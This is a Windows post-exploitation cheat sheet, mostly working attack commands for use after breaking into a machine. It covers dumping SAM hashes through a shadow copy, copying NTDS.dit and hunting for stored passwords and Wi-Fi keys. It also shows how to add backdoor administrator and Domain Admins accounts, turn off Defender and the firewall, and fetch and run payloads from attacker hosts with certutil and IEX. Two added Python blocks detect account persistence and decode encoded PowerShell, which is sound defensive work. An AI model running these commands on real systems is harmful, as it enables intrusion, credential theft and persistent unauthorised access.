Windows post-exploitation

Once you have access to a Windows machine, it is important to gather as much information as you can before continuing your hacking journey.

Commands

General commands

Here are some useful commands to execute once we are in:

whoami /all - Lists the current user and its SID, the groups the user is a member of together with their SIDs, and the current privilege level.

systeminfo - Outputs a large amount of data about the system, including hostname, domain, logon server, time zone, network interface config, and hotfixes installed.

qprocess * - Much like tasklist, but a bit easier to read. It has username, login method, session id, pid, and binary name.

net config workstation - This will display information such as NetBIOS name, the full computer name, Username (of the user executing this command), Domain, Workgroups, and more.

net user test 12345678 /add - creates a local user called test with the password 12345678.

net localgroup administrators /add test or net localgroup administrators test /add - adds the new user test to the local administrators group.

dir /s *pass* == *key* == *vnc* == *.config* - search for files whose names contain these keywords.

findstr /si pass *.xml *.ini *.txt - search for string.

reg query HKLM /f pass /t REG_SZ /s and reg query HKCU /f pass /t REG_SZ /s - search for registry string.

netsh wlan show profile - Wifi AP SSID.

netsh wlan show profile <SSID> key=clear - clear text pass for wifi.

System files to pull

Get as much as you can for offline analysis:

%SYSTEMDRIVE%\pagefile.sys - Large file, but it contains spill-over from RAM and usually a lot of useful information can be pulled from it. Analyze this file using FTK Imager.

%SYSTEMROOT%\repair\SAM and %SYSTEMROOT%\System32\config\RegBack\SAM - Stores user passwords in LM hash and/or NTLM hash format. Extract the hashes using samdump2 (samdump2 SYSTEM SAM > hashes.txt) or pwdump (pwdump system sam).

Because the SAM hive of the running system is locked, it can instead be copied out of a Volume Shadow Copy with PowerShell:

$service=(Get-Service -Name VSS)
# Start the Volume Shadow Copy service if it is not running and remember that we did so
if($service.Status -ne "Running"){$notrunning=1;$service.Start()}
# Create a shadow copy of C: and look up the volume object by its ID
$id=(gwmi -List win32_shadowcopy).Create("C:\","ClientAccessible").ShadowID
$volume=(gwmi win32_shadowcopy -Filter "ID='$id'")
# Copy the SAM hive out of the shadow copy device
cmd /c copy "$($volume.DeviceObject)\windows\system32\config\sam" C:\Users\Public
# Remove the shadow copy and stop the service again if we started it
$volume.Delete();if($notrunning -eq 1){$service.Stop()}

%SYSTEMROOT%\repair\system and %SYSTEMROOT%\System32\config\RegBack\system - This is the SYSTEM registry hive. It is needed to extract the user account password hashes from a Windows system; as above, use samdump2 or pwdump.

%USERPROFILE%\ntuser.dat - User-level Windows registry settings. Analyze using RegRipper.

%SYSTEMROOT%\config\SAM and %SYSTEMROOT%\config\SOFTWARE and %SYSTEMROOT%\config\SECURITY and %SYSTEMROOT%\config\SYSTEM - registry hives. Analyze using RegRipper or hivexsh.

%USERPROFILE%\LocalS~1\Tempor~1\Content.IE5\index.dat - Internet Explorer web browser history file. Use the pasco tool to parse and view the contents of these files, and use grep to filter the output on the date you are interested in: pasco 'index.dat' | grep '04/28' | less

%WINDIR%\System32\drivers\etc\hosts - System hosts file for local translation of host names to IP addresses.

Other interesting files

Of course, also the data files of the various installed programs, such as Outlook .pst files containing email messages or KeePass .kdbx databases containing user passwords.

It's best to list all installed programs and browse their folders for configuration files or files in which those programs store data. Additionally, you can search for office and text documents. Although it sounds unbelievable, many users still keep their passwords in .txt or .docx files on the desktop, in a file called e.g. passwords.txt. [SIC!]

To list all installed software you can use this PowerShell command:

Get-ItemProperty HKLM:\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\* | Select-Object DisplayName, DisplayVersion, Publisher, InstallDate | Format-Table -AutoSize > C:\InstalledProgramsPS.txt

Non-interactive software uninstall

You can use this, for example, to uninstall antivirus software.

wmic product get name /value - this gets software names

wmic product where name="software_name" call uninstall /Interactive:Off - this uninstalls software

Basic CMD

Version and Patches info

wmic os get osarchitecture || echo %PROCESSOR_ARCHITECTURE% #Get architecture
systeminfo
systeminfo | findstr /B /C:"OS Name" /C:"OS Version" #Get only that information
wmic qfe get Caption,Description,HotFixID,InstalledOn #Patches
hostname
DRIVERQUERY #3rd party driver vulnerable?

Mounted disks

(wmic logicaldisk get caption 2>nul | more) || (fsutil fsinfo drives 2>nul)

AV

WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List

Processes, Services & Software

schtasks /query /fo LIST /v #Verbose output of scheduled tasks
tasklist /V #List processes
tasklist /SVC #Links processes to started services
net start #Windows services started
wmic service list brief #List services
sc query #List of services
dir /a "C:\Program Files" #Installed software
dir /a "C:\Program Files (x86)" #Installed software
reg query HKEY_LOCAL_MACHINE\SOFTWARE #Installed software

Domain info

echo %USERDOMAIN% #Get domain name
echo %USERDNSDOMAIN% #Get domain name
echo %logonserver% #Get name of the domain controller
set logonserver #Get name of the domain controller
set log #Get name of the domain controller
net groups /domain #List of domain groups
net group "domain computers" /domain #List of PCs connected to the domain
net view /domain #List of PCs of the domain
nltest /dclist:<DOMAIN> #List domain controllers
net group "Domain Controllers" /domain #List PC accounts of domain controllers
net group "Domain Admins" /domain #List users with domain admin privileges
net localgroup administrators /domain #List users that belong to the administrators group inside the domain (the group "Domain Admins" is included here)
net user /domain #List all users of the domain
net user <ACCOUNT_NAME> /domain #Get information about that user
net accounts /domain #Password policy
nltest /domain_trusts #Mapping of the trust relationships

Users

whoami /all #All info about me, take a look at the enabled tokens
whoami /priv #Show only privileges
net users #All users
dir /b /ad "C:\Users\"
net user %username% #Info about a user (me)
net accounts #Information about password requirements
qwinsta #Anyone else logged in?
cmdkey /list #List credentials
net user /add [username] [password] #Create user

::Launch a new cmd.exe with new creds (to impersonate in the network)
runas /netonly /user:<DOMAIN>\<NAME> "cmd.exe" #The password will be prompted

Groups

#Local
net localgroup #All available groups
net localgroup Administrators #Info about a group (admins)
net localgroup administrators [username] /add #Add user to administrators

#Domain
net group /domain #Info about domain groups
net group /domain <domain_group_name> #Users that belong to the group

List sessions

qwinsta
klist sessions

Persistence with user

# Add domain user and put them in the Domain Admins group
net user username password /ADD /DOMAIN
net group "Domain Admins" username /ADD /DOMAIN

# Add local user and put them in the local Administrators group
net user username password /ADD
net localgroup Administrators username /ADD

# Add user to interesting groups:
net localgroup "Remote Desktop Users" UserLoginName /add
net localgroup "Debugger users" UserLoginName /add
net localgroup "Power users" UserLoginName /add

Network

Interfaces, Routes, Ports, Hosts and DNSCache

Firewall

netsh firewall show state # FW info, open ports
netsh firewall show config # FW info
Netsh Advfirewall show allprofiles

NetSh Advfirewall set allprofiles state off #Turn Off
NetSh Advfirewall set allprofiles state on #Turn On
netsh firewall set opmode disable #Turn Off

::How to open ports
netsh advfirewall firewall add rule name="NetBIOS UDP Port 138" dir=out action=allow protocol=UDP localport=138
netsh advfirewall firewall add rule name="NetBIOS TCP Port 139" dir=in action=allow protocol=TCP localport=139
netsh firewall add portopening TCP 3389 "Remote Desktop"

::Enable Remote Desktop
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
netsh firewall add portopening TCP 3389 "Remote Desktop"
::netsh firewall set service remotedesktop enable #I found that this line is not needed
::sc config TermService start= auto #I found that this line is not needed
::net start Termservice #I found that this line is not needed

::Enable Remote Assistance:
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fAllowToGetHelp /t REG_DWORD /d 1 /f
netsh firewall set service remoteadmin enable

::Ninja combo (new admin user, RDP + Remote Assistance + firewall allow)
net user hacker Hacker123! /add & net localgroup administrators hacker /add & net localgroup "Remote Desktop Users" hacker /add & reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f & reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fAllowToGetHelp /t REG_DWORD /d 1 /f & netsh firewall add portopening TCP 3389 "Remote Desktop" & netsh firewall set service remoteadmin enable

::Connect to RDP (using hash or password)
xfreerdp /u:alice /d:WORKGROUP /pth:b74242f37e47371aff835a6ebcac4ffe /v:10.11.1.49
xfreerdp /u:hacker /d:WORKGROUP /p:Hacker123! /v:10.11.1.49
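The account-creation one-liners in "Persistence with user" and the "Ninja combo" above leave a very recognisable trace in the Security log: a 4720 (account created) followed within seconds by 4732 (member added to a local group) or 4728 (member added to a global group such as Domain Admins) for the same account. The following detector is an added example written for this page from the defender's side; it is not code from the original post. The event records are constructed and normalised to a few simplified field names (time, event_id, subject, target, group), not the raw EVTX field names a SIEM would present.

```python
from datetime import datetime, timedelta
from typing import Dict, List

# Groups the page's persistence commands add accounts to. Adding a freshly
# created account to any of these within minutes is worth an alert.
PRIVILEGED_GROUPS = {"Administrators", "Domain Admins", "Remote Desktop Users", "Power Users"}

# Constructed sample Security events (made up for this example). Field names
# are simplified: in real 4732/4728 events the group is TargetUserName and the
# added account is MemberName.
SAMPLE_EVENTS: List[Dict] = [
    {"time": "2024-05-01T10:00:05", "event_id": 4720, "subject": "WS01\\svc-backup", "target": "hacker", "group": None},
    {"time": "2024-05-01T10:00:06", "event_id": 4732, "subject": "WS01\\svc-backup", "target": "hacker", "group": "Administrators"},
    {"time": "2024-05-01T10:00:07", "event_id": 4732, "subject": "WS01\\svc-backup", "target": "hacker", "group": "Remote Desktop Users"},
    {"time": "2024-05-01T11:30:00", "event_id": 4720, "subject": "CORP\\helpdesk", "target": "jdoe", "group": None},
    {"time": "2024-05-01T11:59:30", "event_id": 4720, "subject": "CORP\\svc-backup", "target": "backdoor", "group": None},
    {"time": "2024-05-01T12:00:00", "event_id": 4728, "subject": "CORP\\svc-backup", "target": "backdoor", "group": "Domain Admins"},
    {"time": "2024-05-02T09:00:00", "event_id": 4732, "subject": "CORP\\helpdesk", "target": "jdoe", "group": "Remote Desktop Users"},
]


def detect_account_persistence(events: List[Dict], window_minutes: int = 10) -> List[Dict]:
    """Flag accounts created and then added to a privileged group within the window.

    Onboarding by a helpdesk usually separates the two steps by far more than a
    few minutes; the one-liners on this page do both within a second.
    """
    window = timedelta(minutes=window_minutes)
    created: Dict[str, datetime] = {}  # account name -> time of its most recent 4720
    alerts: List[Dict] = []
    for ev in sorted(events, key=lambda e: e["time"]):
        when = datetime.fromisoformat(ev["time"])
        account = ev["target"].lower()
        if ev["event_id"] == 4720:
            created[account] = when
        elif ev["event_id"] in (4732, 4728) and ev["group"] in PRIVILEGED_GROUPS:
            created_at = created.get(account)
            if created_at is not None and when - created_at <= window:
                alerts.append({
                    "account": ev["target"],
                    "group": ev["group"],
                    "actor": ev["subject"],
                    "seconds_after_creation": int((when - created_at).total_seconds()),
                })
    return alerts


if __name__ == "__main__":
    for alert in detect_account_persistence(SAMPLE_EVENTS):
        print(alert)
```

On the sample data the rule fires three times (hacker into Administrators and Remote Desktop Users, backdoor into Domain Admins) and stays silent for jdoe, whose group change comes a day after the account was created. The window is the only tunable; pairing the rule with the 4657/registry-change events for fDenyTSConnections and fAllowToGetHelp would cover the RDP half of the combo as well.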

Shares

net view #Get a list of computers
net view \\computer #List shares of a computer
net use x: \\computer\share #Mount the share locally
net share #Check current shares

Wifi

netsh wlan show profile #AP SSID
netsh wlan show profile <SSID> key=clear #Get cleartext pass

Copying NTDS.dit using Ntdsutil

ntdsutil "ac i ntds" "ifm" "create full c:\copy-ntds" quit quit

Misc

cd #Get current dir
cd C:\path\to\dir #Change dir
dir #List current dir
dir /a:h C:\path\to\dir #List hidden files
dir /s /b #Recursive bare list (paths only, no headers)
time #Get current time
date #Get current date
shutdown /r /t 0 #Reboot now
type <file> #Cat file

#Download
certutil.exe -urlcache -split -f "http://10.10.14.13:8000/shell.exe" s.exe
bitsadmin /transfer transfName /priority high http://example.com/examplefile.pdf C:\downloads\examplefile.pdf

#Runas
runas /savecred /user:WORKGROUP\Administrator "\\10.XXX.XXX.XXX\SHARE\evil.exe" #Use saved credentials
runas /netonly /user:<DOMAIN>\<NAME> "cmd.exe" #The password will be prompted

#Hide
attrib +h file #Set hidden
attrib -h file #Unset hidden

#Give full control over a file that you own
icacls <FILE_PATH> /grant <USERNAME>:F /t
icacls <FILE_PATH> /remove <USERNAME> /t #Remove the permission

#Recursive copy to smb
xcopy /hievry C:\Users\security\.yawcam \\10.10.14.13\name\win

#exe2bat transforms an exe file into a bat file

#ADS
dir /r #Detect ADS
more < file.txt:ads.txt #Read ADS
powershell (Get-Content file.txt -Stream ads.txt)

Basic PowerShell

Download and execute

powershell "IEX(New-Object Net.WebClient).downloadString('http://example.com:8080/test_script.ps1')"
echo IEX(New-Object Net.WebClient).DownloadString('http://example.com:8080/test_script.ps1') | powershell -noprofile - #From cmd download and execute
powershell -exec bypass -c "(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('http://example.com:8080/test_script.ps1')|iex"

Using b64 from linux

echo -n "IEX(New-Object Net.WebClient).downloadString('http://example.com:8080/test_script.ps1')" | iconv -t UTF-16LE | base64 -w 0
powershell -nop -enc <BASE64_ENCODED_PAYLOAD>
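The -enc argument is nothing more than the UTF-16LE bytes of the script, base64-encoded, which is why the iconv | base64 pipeline above produces it. The same transformation run backwards is how an analyst reads such a command line out of a process-creation log. The following Python is an added example written for this page, not code from the original post; the sample command lines are constructed, and the regex for the flag only covers the common short forms (-e, -ec, -enc, -EncodedCommand, with - or /), not every prefix powershell.exe would accept.

```python
import base64
import binascii
import re
from typing import List, Optional

# powershell.exe accepts '-' or '/' before the parameter and any unambiguous
# prefix of -EncodedCommand; the alternatives here are the forms seen most often.
ENCODED_FLAG = re.compile(
    r"(?<!\S)[-/](?:e|ec|enc|encodedcommand)(?!\S)\s+([A-Za-z0-9+/=]+)",
    re.IGNORECASE,
)


def encode_powershell_command(script: str) -> str:
    """Produce what -EncodedCommand expects: base64 of the UTF-16LE text.

    Same transformation as `iconv -t UTF-16LE | base64 -w 0`.
    """
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_powershell_command(blob: str) -> Optional[str]:
    """Reverse the encoding; return None if the blob is not a valid payload.

    A blob truncated by a log line limit decodes to an odd number of bytes,
    which the UTF-16LE decoder rejects, so truncated payloads come back as None.
    """
    padded = blob + "=" * (-len(blob) % 4)  # tolerate stripped '=' padding
    try:
        raw = base64.b64decode(padded, validate=True)
        return raw.decode("utf-16-le")
    except (binascii.Error, UnicodeDecodeError):
        return None


def decode_encoded_commands(cmdline: str) -> List[str]:
    """Return the decoded script for every -EncodedCommand argument in a command line."""
    decoded = []
    for match in ENCODED_FLAG.finditer(cmdline):
        script = decode_powershell_command(match.group(1))
        if script is not None:
            decoded.append(script)
    return decoded


# Constructed sample process command lines, as they would appear in Security
# 4688 or Sysmon event 1. The first is the page's -enc form with "whoami" as
# the payload; the last is the same blob with its final character cut off.
SAMPLE_CMDLINES = [
    "powershell -nop -enc dwBoAG8AYQBtAGkA",
    "powershell.exe -NoProfile -EncodedCommand "
    + encode_powershell_command("IEX(New-Object Net.WebClient).downloadString('http://example.com:8080/test_script.ps1')"),
    'powershell -exec bypass -c "whoami"',  # no encoded argument at all
    "powershell -enc dwBoAG8AYQBtAGk",      # truncated blob, ignored
]


def triage(cmdlines: List[str]) -> List[str]:
    """Flatten the decoded payloads found in a batch of command lines."""
    found = []
    for line in cmdlines:
        found.extend(decode_encoded_commands(line))
    return found


if __name__ == "__main__":
    for script in triage(SAMPLE_CMDLINES):
        print(repr(script))
```

Running the block prints the two recoverable payloads, "whoami" and the IEX download cradle from the page. Decoding is only the first layer: the recovered script may itself contain further base64, compression or string concatenation, so the output is input for the next round of triage rather than a final verdict.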

Enable WinRM (Remote PS)

enable-psremoting -force

Disable Defender

# From a PowerShell running as NT AUTHORITY\SYSTEM
Set-MpPreference -DisableRealtimeMonitoring $true

PS-History

Get-Content C:\Users\<USERNAME>\AppData\Roaming\Microsoft\Windows\Powershell\PSReadline\ConsoleHost_history.txt

OS version and HotFixes

[System.Environment]::OSVersion.Version #Current OS version
Get-WmiObject -query 'select * from win32_quickfixengineering' | foreach {$_.hotfixid} #List all patches
Get-Hotfix -description "Security update" #List only "Security Update" patches

Other connected drives

Get-PSDrive | where {$_.Provider -like "Microsoft.PowerShell.Core\FileSystem"} | ft Name,Root

Users

Get-LocalUser | ft Name,Enabled,Description,LastLogon
Get-ChildItem C:\Users -Force | select Name

Groups

Get-LocalGroup | ft Name #All groups
Get-LocalGroupMember Administrators | ft Name, PrincipalSource #Members of Administrators

SUDO

#CREATE A CREDENTIAL OBJECT
$pass = ConvertTo-SecureString '<PASSWORD>' -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential("<USERNAME>", $pass)
#CHECK THAT THE CREDENTIALS WORK BY EXECUTING whoami (expected: username of the credentials user)
Invoke-Command -ComputerName ARKHAM -ScriptBlock { whoami } -Credential $cred
#DOWNLOAD nc.exe
Invoke-Command -ComputerName ARKHAM -ScriptBlock { IWR -Uri 10.10.14.17/nc.exe -OutFile nc.exe } -Credential $cred

#START AN ELEVATED PROCESS WITH THE SAME CREDENTIAL OBJECT
Start-Process powershell -Credential $cred -ArgumentList '-noprofile -command &{Start-Process C:\xyz\nc.bat -verb Runas}'

Clipboard

Get-Clipboard

Processes

Get-Process | where {$_.ProcessName -notlike "svchost*"} | ft ProcessName, Id

Services

Get-Service

Network interfaces

Get-NetIPConfiguration | ft InterfaceAlias,InterfaceDescription,IPv4Address
Get-DnsClientServerAddress -AddressFamily IPv4 | ft

ARP

Get-NetNeighbor -AddressFamily IPv4 | ft ifIndex,IPAddress,LinkLayerAddress,State

Hosts

Get-Content C:\WINDOWS\System32\drivers\etc\hosts

SNMP

Get-ChildItem -Path HKLM:\SYSTEM\CurrentControlSet\Services\SNMP -Recurse